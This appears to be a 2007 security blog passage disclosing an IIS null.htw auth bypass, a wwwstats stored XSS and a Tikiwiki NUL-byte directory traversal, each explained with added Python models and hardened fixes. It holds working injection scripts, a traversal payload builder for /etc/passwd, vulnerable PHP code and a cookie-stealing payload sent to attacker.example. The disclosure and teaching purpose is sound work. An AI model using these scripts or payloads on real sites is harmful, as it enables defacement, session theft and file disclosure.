Sunday, December 30, 2007

Microsoft IIS ntlm and basic auth bypass

If you protect your web content with NTFS ACLs, you are secure.
If you protect it only with Internet Information Services basic/NTLM authentication, that protection can be bypassed through the null.htw object.

Both look like the same protection, but the null.htw object lets a user fetch any file in the web directory; only content that is also protected at the filesystem level stays secure.

The exploit below shows how the null.htw object is used.

#!/bin/bash
# sha0[at]
# Based on my adv:
# (CVE-2007-2815)

if [ $# != 2 ]; then
    printf "USAGE:\t\t$0 \nExample:\t$0 /en/us/default.aspx\n\n"
    exit 0
fi

# $evil is the null.htw request built from the two arguments; its
# construction is not reproduced on this page.
lynx -dump "$evil"

It is hard to believe.
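The post's point is that a rule attached to a URL prefix is not a rule attached to the file. The following model illustrates that distinction; it is an added example, not IIS code and not the exploit from the post. It assumes that the bypass works through an auxiliary handler which opens a file named in a request parameter (the handler name /null.htw is taken from the post; how the real object names its target is not reproduced). The sample files, users and permissions are constructed.

```python
"""Model of web-layer versus filesystem-layer protection.

Added example (not IIS code, not the exploit from the post). An auxiliary
handler that opens a file named in a request parameter walks past a
URL-based authentication check, because the only URL the web layer sees is
the handler's own. A file-level ACL is checked against the file actually
opened, so it is not bypassed.
"""

# Constructed sample content and permissions.
FILES = {
    "/admin/secret.txt": "top secret",
    "/public/index.html": "hello",
}
# Modelled NTFS ACLs: principals allowed to read each file.
NTFS_ACL = {
    "/admin/secret.txt": {"admin"},
    "/public/index.html": {"anonymous", "admin"},
}
# Modelled IIS basic/NTLM requirement: principals allowed under a URL prefix.
# Anything outside these prefixes is reachable anonymously.
WEB_AUTH = {"/admin/": {"admin"}}

HELPER_URL = "/null.htw"  # assumed: auxiliary handler outside any protected prefix


class Denied(Exception):
    """Raised by whichever layer refuses the request."""


def web_layer_allows(url_path: str, user: str) -> bool:
    """IIS-style check: keyed on the URL that was requested."""
    return all(user in allowed
               for prefix, allowed in WEB_AUTH.items()
               if url_path.startswith(prefix))


def fs_layer_allows(file_path: str, user: str) -> bool:
    """NTFS-style check: keyed on the file that is actually opened."""
    return user in NTFS_ACL.get(file_path, set())


def serve(url_path: str, user: str, target_file: str, enforce_fs: bool) -> str:
    """One request. url_path is what the web layer sees; target_file is what
    gets opened. For a plain GET they are the same; for the helper they differ."""
    if not web_layer_allows(url_path, user):
        raise Denied("web-layer auth on " + url_path)
    if enforce_fs and not fs_layer_allows(target_file, user):
        raise Denied("file ACL on " + target_file)
    return FILES[target_file]


def can_read(user: str, file_path: str, via_helper: bool, enforce_fs: bool) -> bool:
    """True if `user` obtains file_path, either directly or through the helper."""
    url = HELPER_URL if via_helper else file_path
    try:
        serve(url, user, file_path, enforce_fs)
        return True
    except Denied:
        return False


if __name__ == "__main__":
    for fs in (False, True):
        print("file ACL enforced:", fs,
              "| anonymous direct:", can_read("anonymous", "/admin/secret.txt", False, fs),
              "| anonymous via helper:", can_read("anonymous", "/admin/secret.txt", True, fs))
```

With the web-layer rule alone, the direct request is refused but the same file comes back through the helper; with the file ACL enforced, both paths are refused, which is the behaviour the post attributes to NTFS-protected content.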

Thursday, December 27, 2007

wwwstats vulnerable to Persistent XSS

wwwstats is a very widely used web traffic analyser that records user agents, referers, downloads and so on in a database.

I discovered a way to inject HTML and JavaScript into the database by calling clickstats.php directly. That means mass defacement, stolen admin sessions, web redirection, XSS worms, google-bombing and search-ranking manipulation.

To get past the first 'if', the HTTP Referer header must be non-empty; the payload is then written to the database through the link GET parameter.

An attacker can inject, through the link parameter or the User-Agent header, a script that steals the admin's cookies, defaces the page, or anything else.

If magic_quotes is enabled in php.ini, that is no obstacle: in JavaScript, \'test\' is interpreted as 'test', and the tags themselves are left untouched.

By controlling the number of iterations it is possible to place the injection at the ranking position you want:

# TARGET: base URL of the wwwstats installation (not reproduced on this page)
while [ 1 ]; do
    curl "$TARGET/clickstats.php?link=<script>XXXX</script>" -e 'xxx'
done

It is also possible to attack through the User-Agent header, adding -A 'attack' to the curl command line.

A payload can be:

<script src=''></script>

#!/bin/bash
# jolmos (at) isecauditors (dot) com

# needs at least the target URL, the payload and the number of requests
if [ $# -lt 3 ]; then
    echo "Usage: $0 <url> <html or javascript to inject in downloads> <iterations>"
    echo "Example: $0 <url> '<script>window.location=\"\"</script>' 100"
    exit 1
fi

echo 'Attacking, wait a moment'
# -G --data-urlencode sends the payload URL-encoded in the query string;
# -e sets the Referer, which must be non-empty to get past the first 'if'
for i in $(seq 1 "$3"); do
    curl -G --data-urlencode "link=$2" -e 'attack' "$1/clickstats.php"
done
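The post says magic_quotes is not an obstacle and that a missing Referer stops the request. The following model shows both, plus the output-encoding fix that does stop the injection; it is an added example, not wwwstats code. The stored-field layout, the rendering of the stats page and the attacker host are assumptions for the model, and the payload is constructed.

```python
"""Why magic_quotes does not stop the wwwstats injection, and what does.

Added example (not wwwstats code). record_click() models the behaviour the
post describes: a request without a Referer is dropped, anything else is
stored. addslashes() models PHP's magic_quotes_gpc, which backslash-escapes
quotes on input. That is an SQL-oriented transform: the stored value is later
echoed into HTML, and inside a <script> block a JavaScript string literal
accepts \\' as a quote, so the script still runs. Escaping on output with the
equivalent of htmlspecialchars() is what neutralises the markup.
"""
import html
import re

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def addslashes(value: str) -> str:
    """Model of PHP addslashes() / magic_quotes_gpc: escapes \\, ', \" and NUL."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\0", "\\0"))


def record_click(db: list, referer: str, link: str, user_agent: str,
                 magic_quotes: bool) -> bool:
    """Model of clickstats.php: requests without a Referer are ignored
    (the 'first if' of the post); the link parameter and User-Agent are stored."""
    if not referer:
        return False
    if magic_quotes:
        link, user_agent = addslashes(link), addslashes(user_agent)
    db.append((link, user_agent))
    return True


def render_row_vulnerable(link: str, user_agent: str) -> str:
    """Assumed stats-page row echoing stored fields into HTML without encoding."""
    return f'<tr><td><a href="{link}">{link}</a></td><td>{user_agent}</td></tr>'


def render_row_hardened(link: str, user_agent: str) -> str:
    """Same row with htmlspecialchars()-style encoding applied on output."""
    return (f'<tr><td><a href="{html.escape(link, quote=True)}">'
            f'{html.escape(link)}</a></td><td>{html.escape(user_agent)}</td></tr>')


def contains_script_tag(rendered: str) -> bool:
    """Does a <script> element survive into the rendered HTML?"""
    return SCRIPT_TAG.search(rendered) is not None


# Constructed payload of the shape the post uses (cookie theft to an attacker host).
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def demo(magic_quotes: bool) -> dict:
    """Send one injected click with and without a Referer, render the stored
    row both ways, and report what survives."""
    db = []
    dropped = not record_click(db, "", PAYLOAD, "Mozilla/5.0", magic_quotes)
    stored = record_click(db, "http://anything/", PAYLOAD, "Mozilla/5.0", magic_quotes)
    link, ua = db[0]
    return {
        "dropped_without_referer": dropped,
        "stored_with_referer": stored,
        "stored_link": link,
        "vulnerable_runs_script": contains_script_tag(render_row_vulnerable(link, ua)),
        "hardened_runs_script": contains_script_tag(render_row_hardened(link, ua)),
    }


if __name__ == "__main__":
    for mq in (False, True):
        print("magic_quotes:", mq, demo(mq))
```

With magic_quotes on, the stored link becomes `<script>document.location=\'http://...\'+document.cookie</script>`, which is still a valid script element with a valid string literal inside it; the hardened renderer turns the angle brackets into entities and the browser never sees a script element at all.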


Tikiwiki CMS Directory Traversal

Tikiwiki is a full-featured CMS, massively used around the world.
(search on Google: tiki-index.php)

On 18/12/2007 I was auditing the code and found a dangerous vulnerability that lets a malicious user read any file on the system via the web (with the Apache user's permissions).

Mose and the developers quickly fixed the problem and released version 1.9.9.
Free software gets more secure every day thanks to the quick response of the community.

Exploit explanation:

Why the "1234" stuff?
The last 4 bytes of the movie parameter are removed and an .xml extension is appended.
tiki-listmovies therefore strips the trailing "1234", and the null byte placed just before it truncates the path when it reaches fopen(), so the appended extension is ignored.

Only the first 1000 bytes of the file can be read (fread() is called with a length of 1000).
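The string arithmetic above is easy to get wrong by one byte, so here it is carried through in a model; this is an added example, not Tikiwiki code. build_conf_file() reproduces the vulnerable expression `'tikimovies/'.substr($movie,0,-4).".xml"`, c_string() models the NUL-byte truncation that PHP's fopen() of that era inherited from the C library, and the hardened resolver shows the checks that close the hole. The traversal depth and the `intro.swf` sample name are constructed inputs.

```python
"""Model of the tiki-listmovies.php path construction and a hardened resolver.

Added example (not Tikiwiki code). build_conf_file() reproduces the string
arithmetic of the vulnerable line, 'tikimovies/' . substr($movie, 0, -4) . '.xml'.
c_string() models what the C-level fopen() saw when PHP of that era handed it
the path: everything from the first NUL byte onward is gone, so the appended
.xml extension disappears with it. traversal_payload() builds the shape the
post describes: a traversal prefix, the target, a NUL byte, and four filler
bytes ('1234') for substr() to remove. The hardened resolver rejects NUL
bytes and directory components and checks the final path stays inside the
movies directory.
"""
import posixpath
import re

MOVIES_DIR = "tikimovies"
NAME_RE = re.compile(r"[A-Za-z0-9_-]+")  # assumed allow-list for movie stems


def build_conf_file(movie: str) -> str:
    """Vulnerable construction: drop the last 4 bytes, append .xml, no validation."""
    return MOVIES_DIR + "/" + movie[:-4] + ".xml"


def c_string(path: str) -> str:
    """The path as a NUL-terminated C string sees it."""
    return path.split("\0", 1)[0]


def effective_path(movie: str) -> str:
    """File actually opened: normalised view of what reaches fopen()."""
    return posixpath.normpath(c_string(build_conf_file(movie)))


def traversal_payload(target: str, depth: int = 8) -> str:
    """movie= value that reads `target`: enough '../' to reach /, a NUL, and filler."""
    return "../" * depth + target.lstrip("/") + "\0" + "1234"


def resolve_conf_file_hardened(movie: str, movies_dir: str = MOVIES_DIR) -> str:
    """Accepts only a bare file name and confines the result to movies_dir."""
    if "\0" in movie:
        raise ValueError("NUL byte in movie parameter")
    if posixpath.basename(movie) != movie or len(movie) <= 4:
        raise ValueError("movie must be a bare file name with an extension")
    stem = movie[:-4]
    if not NAME_RE.fullmatch(stem):
        raise ValueError("unexpected characters in movie name")
    base = posixpath.normpath(movies_dir)
    candidate = posixpath.normpath(posixpath.join(base, stem + ".xml"))
    if posixpath.dirname(candidate) != base:  # belt and braces
        raise ValueError("path escapes movies directory")
    return candidate


def hardened_rejects(movie: str) -> bool:
    """True if the hardened resolver refuses this movie value."""
    try:
        resolve_conf_file_hardened(movie)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    p = traversal_payload("/etc/passwd")
    print("vulnerable string :", repr(build_conf_file(p)))
    print("fopen() actually  :", effective_path(p))
    print("hardened rejects  :", hardened_rejects(p))
```

Running it shows the full string still ending in `\x00.xml`, and the path fopen() actually resolves ending in `etc/passwd` with no extension, which is exactly why the "1234" filler and the null byte are both needed.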

The vulnerable code:

if(isset($_GET["movie"])) {
    // VULNERABLE: $movie comes straight from the request; "../" sequences
    // and a NUL byte both survive into the path built below.
    $movie = $_GET["movie"];

    if ($movie) {
        // Initialize movie size
        // substr() drops the last 4 bytes (the "1234" filler) and ".xml" is
        // appended after the attacker's NUL byte, so fopen() never sees it.
        $confFile = 'tikimovies/'.substr($movie,0,-4).".xml";

        //trc('confFile', $confFile);
        $fh = @fopen($confFile,'r');
        $config = @fread($fh, 1000);   // only the first 1000 bytes are read
        if (isset($config) && $config <>'') {
            $width =
                preg_replace("/^.*?<MovieWidth>(.*?)<\/MovieWidth>.*$/ms", "$1", $config);
            $height =
                preg_replace("/^.*?<MovieHeight>(.*?)<\/MovieHeight>.*$/ms", "$1",